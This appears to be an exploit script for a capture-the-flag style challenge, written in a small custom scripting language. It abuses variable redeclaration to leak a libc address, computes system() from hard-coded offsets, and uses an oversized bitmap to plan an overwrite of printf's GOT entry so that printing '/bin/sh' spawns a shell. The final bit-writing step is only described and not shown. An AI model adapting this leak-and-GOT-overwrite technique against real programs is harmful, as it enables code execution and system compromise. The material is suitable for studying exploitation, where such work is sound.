print("=== Direct GOT Write Test ===");

print("Step 1: Setup");
int leak1 = 0;
string leak1 = "first";
int addr1 = leak1;
print("addr1:");
print(addr1);

string v2 = "BBBBBBBB";
int v2 = 4231312;
int leaked = length(v2);
print("Leaked libc:");
print(leaked);

print("Step 2: Calculate system_addr");
int setvbufoffset = 558416;
int systemoffset = 362320;
int libcbase = leaked - setvbufoffset;
int systemaddr = libcbase + systemoffset;
print("system_addr:");
print(systemaddr);

print("Step 3: Create bitmap");
bitmap b1 = create(9223372036854775807, 2);

print("Step 4: Try writing directly to printf@GOT");
print("printf@GOT = 0x409048 (4202568)");
print("If bitmap buffer is at a known location, we can calculate offset");

print("Test 1: Assume bitmap at binary base (0x400000)");
int gotaddr = 4202568;
int bitmapptr1 = 4194304;
int offset1 = gotaddr - bitmapptr1;
int bitindex1 = offset1 * 8;
print("offset1:");
print(offset1);
print("bit_index1:");
print(bitindex1);

print("Writing system_addr to GOT...");
print("This requires 64 set() calls starting at bit_index1");
print("Generated by Python helper");

print("Step 5: After writing, trigger shell");
print("print with /bin/sh");
